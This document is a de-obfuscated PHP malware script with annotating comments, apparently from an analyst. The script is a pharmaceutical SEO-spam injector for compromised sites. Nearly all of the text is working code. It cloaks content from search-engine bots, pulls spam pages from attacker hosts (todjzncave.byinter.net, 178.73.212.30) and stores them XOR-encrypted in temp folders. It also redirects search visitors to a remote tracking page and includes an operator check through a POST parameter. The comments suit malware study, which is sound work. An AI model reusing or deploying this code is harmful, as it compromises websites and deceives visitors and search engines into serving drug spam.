reverse of mal script

1. if (!defined('frmDs')){
2. define('frmDs' ,1);
3. error_reporting(0);
4.  
5. //XOR file by each character
6. function frm_crpt($in)
7. {
8. $il=strlen($in);
9. $o='';
10.  
11. //loop through each character
12. for ($i = 0; $i < $il; $i++)
13. {
14. //XOR character
15. $o.=$in[$i] ^ '*';
16. }
17. return $o;
18. }
19.  
20. //store local cache copy of X as encrypted file
21. function frm_getcache($tmpdir,$link,$cmtime,$toe=false)
22. {
23. //filename = sess_(md5 hash of page url) in temp directory
24. $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
25. $fe = file_exists($f);
26. if(!$fe || time() - filemtime($f) > 60 * $cmtime)
27. {
28. //download contents of page from remote url
29. $dlc=file_get_contents($link);
30.  
31. //if file exists and couldnt get contents from remote url
32. if($fe && $dlc===false)
33. //update last modified timestamp in file system
34. @touch($f);
35. else
36. {
37. //if file exists and couldnt get contents from remote url and $toe set false(ignore updates)
38. if($fe && empty($dlc) && $toe)
39. {
40. //update last modified timestamp in file system
41. @touch($f);
42. }
43. else
44. {
45. if($fp = @fopen($f,'w'))
46. {
47. //write contents of cached page as XOR'd contents
48. fwrite($fp, frm_crpt($dlc));
49. //close file pointer
50. fclose($fp);
51. }
52. else
53. {
54. //return file contents
55. return $dlc;
56. }
57. }
58. }
59. }
60. $fc = @file_get_contents($f);
61. return ($fc)?frm_crpt($fc):'';
62. }
63.  
64. //check if page request is coming from search engine or legit browser
65. function frm_isbot(){
66. //set $ua to the user agent string of the requesting http client (could be bot, or browser)
67. $ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
68.  
69. //can we get the ip address of the requesting client, if so, set to $lip
70. //if the operation of setting $lip failed, add the long version of 256.0.0.0 to $lip
71. if(($lip = ip2long($_SERVER['REMOTE_ADDR'])) < 0)
72. {
73. $lip+=4294967296;
74. }
75. $rs = array(
76. array(3639549953,3639558142), //216.239.32.1 216.239.63.254 google
77. array(1089052673,1089060862), //64.233.160.1 64.233.191.254 google
78. array(1123635201,1123639294), //66.249.80.1 66.249.95.254 google
79. array(1208926209,1208942590), //72.14.192.1 72.14.255.254 google
80. array(3512041473,3512074238), //209.85.128.1 209.85.255.254 google
81. array(1113980929,1113985022), //66.102.0.1 66.102.15.254 google
82. array(1249705985,1249771518), //74.125.0.1 74.125.255.254 google
83. array(1074921473,1074925566), //64.18.0.1 64.18.15.254 postini
84. array(3481178113,3481182206), //207.126.144.1 207.126.159.254 postini
85. array(2915172353,2915237886), //173.194.0.1 173.194.255.254 google
86. array(2850291712,2850357247) //169.228.0.0 169.228.255.255 university of california san diego
87. );
88.  
89. //loop through $rs and check that requester doesnt belong to unfriendly ip range
90. foreach ($rs as $r)
91. {
92. if($lip >= $r[0] && $lip <= $r[1])
93. {
94. return true;
95. }
96. }
97.  
98. //if the requestor has a blank user agent, assume unfriendly to script
99. if(!$ua)
100. {
101. return true;
102. }
103.  
104. //bots to check for
105. $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
106.  
107. //if the user agent has any of these bot names in their user agent string, assume unfriendly to script
108. foreach ($bots as $b) if(strpos($ua, $b)!==false)
109. {
110. return true;
111. }
112.  
113. //reverse dns lookup of the requesting client and set to $h
114. $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
115.  
116. //array of unfriendly hostnames
117. $hba=array('google','msn','yahoo');
118.  
119. //compare unfriendly hostnames to reverse dns lookup of client, if match, assume unfriendly to script
120. if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false)
121. {
122. return true;
123. }
124. return false;
125. }
126.  
127. //cleanup files in temp directory locations and return the path of the first found temp directory location
128. function frm_tmpdir(){
129. $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
130. foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
131. if ($t = getenv($v)) {$fs[]=$t;}
132. }
133. if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
134. $fs[]='.';
135.  
136. foreach ($fs as $f){
137. $tf = $f.'/'.md5(rand());
138. if($fp = @fopen($tf, 'w')){
139. fclose($fp);
140. unlink($tf);
141. return $f;
142. }
143. }
144. return false;
145. }
146.  
147. //did the user come in from a search engine
148. function frm_seref(){
149. $r = @strtolower($_SERVER["HTTP_REFERER"]);
150. $ses = array('google','bing','yahoo','ask','aol');
151. foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
152. return false;
153. }
154.  
155. function frm_havekey($hasKey=false){
156. $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
157.  
158. if($s == false)
159. $hasKey = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]);
160.  
161. //sanitize non relevant page requests from mass googledorking like "site:" or "inurl:"
162. if (strpos($hasKey,"site%3A") !==false || strpos($hasKey,"inurl%3A") !== false)
163. return '';
164.  
165. //check to see if page url or search string contains any of our keywords
166. foreach ($nks as $n)
167. {
168. //regex match btw, incase anyone doesnt know what this lame shit looks like
169. if(preg_match("/(\b|_)$n(\b|_)/" , $hasKey))
170. {
171. return $n;
172. }
173. }
174. return '';
175. }
176.  
177. //string encryption function
178. function frm_strtonum($Str, $Check, $Magic) {
179. //not sure why this is interesting but this ladies and gentlemen is a long ip 256.0.0.0 = 4294967296
180. $Int32Unit = 4294967296;
181.  
182. $length = strlen($Str);
183. //loop each character in string
184. for ($i = 0; $i < $length; $i++)
185. {
186. //multiply our primes
187. $Check *= $Magic;
188.  
189. //if $check is greater than our floor
190. if ($Check >= $Int32Unit)
191. {
192. $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
193. $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
194. }
195.  
196. //append ASCII value to encrypted output string
197. $Check += ord($Str{$i});
198. }
199. return $Check;
200. }
201.  
202. function frm_chhash($String) {
203. $Check1 =frm_strtonum($String, 0x1505, 0x21); //0x21 prime 33
204. $Check2 = frm_strtonum($String, 0, 0x1003F); //0x1003F prime 65599
205. $Check1 >>= 2;
206. $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
207. $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
208. $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
209. $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
210. $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
211. $Hashnum = ($T1 | $T2);
212. $CheckByte = 0;
213. $Flag = 0;
214. $HashStr = sprintf('%u', $Hashnum) ;
215. $length = strlen($HashStr);
216. for ($i = $length - 1; $i >= 0; $i --) {
217. $Re = $HashStr{$i};
218. if (1 === ($Flag % 2)) {
219. $Re += $Re;
220. $Re = (int)($Re / 10) + ($Re % 10);
221. }
222. $CheckByte += $Re;
223. $Flag ++;
224. }
225. $CheckByte %= 10;
226. if (0 !== $CheckByte) {
227. $CheckByte = 10 - $CheckByte;
228. if (1 === ($Flag % 2) ) {
229. if (1 === ($CheckByte % 2)) {
230. $CheckByte += 9;
231. }
232. $CheckByte >>= 1;
233. }
234. }
235. return '7'.$CheckByte.$HashStr;
236. }
237.  
238. //get pagerank of url
239. function frm_chpr($url,$td){
240. $ch=frm_chhash($url);
241. $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
242. if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
243. }
244.  
245. //redirects to stat incrimenter or command and control node?
246. function frm_red($hasKey){
247. if(!frm_isbot() && frm_seref()){
248. $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
249. $s=@urlencode($_SERVER['HTTP_REFERER']);
250. die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$hasKey&s=$s&r=$r\");</script></body></html>");
251. }
252. }
253.  
254.  
255.  
256.  
257. //actual work begins here
258. //get path of temp directory
259. $tdir = frm_tmpdir();
260. //set $isb to whether or not requesting browser is a known search engine bot
261. $isb=frm_isbot();
262.  
263. //check if referring search or requested page urls contain certain words
264. $hasKey=frm_havekey();
265.  
266. //get the host name of the website that is running this script
267. $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
268.  
269. //if post variable set for current domain + ch, end execution and print out value of post variable at md5 key
270. if($cv=@$_POST[md5($host . 'ch')])
271. {
272. exit($cv);
273. }
274.  
275. //if the temp directory is set and hostname is less than 100 characters in length and url of page running script is not an ip address
276. if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host))
277. {
278. $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
279. $sp = "http://todjzncave.byinter.net/stat/feed.php?pa=$parg&h=$host";
280.  
281. //if the incoming request is from a bot and the pagerank of the requested page - verify success
282. $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
283. if($isb && ($ppr = frm_chpr($tp)) > 1)
284. {
285. //if the page is not in cache then exit
286. $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
287. if($pc)
288. {
289. die($pc);
290. }
291. }
292.  
293. //set the page requested to $ruri
294. $ruri = strtolower($_SERVER['REQUEST_URI']);
295.  
296. //if wordpress install does not use permalinks increment stat counter and display page from pagecache
297. $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
298. if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
299. frm_red($hasKey);
300. die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
301. }
302.  
303. //if requested page is the homepage of the site, display page from pagecache
304. if (($ruri=='/' || $ruri=='/index.php') && $isb) {
305. $c=frm_getcache($tdir, $sp ,60*24);
306. if($c)
307. {
308. die($c);
309. }
310. }
311.  
312. //if requested page is the homepage of the site, increment stat counter and display page from pagecache
313. if($hasKey && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
314. if(strpos($sdl, '|'.$ruri.'|') !== false)
315. {
316. frm_red($hasKey);
317. die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
318. }
319. }
320. }
321. //no temp directory or long url but url still contains keyword we want to redirect on event
322. if($hasKey)
323. {
324. frm_red($hasKey);
325. }
326. }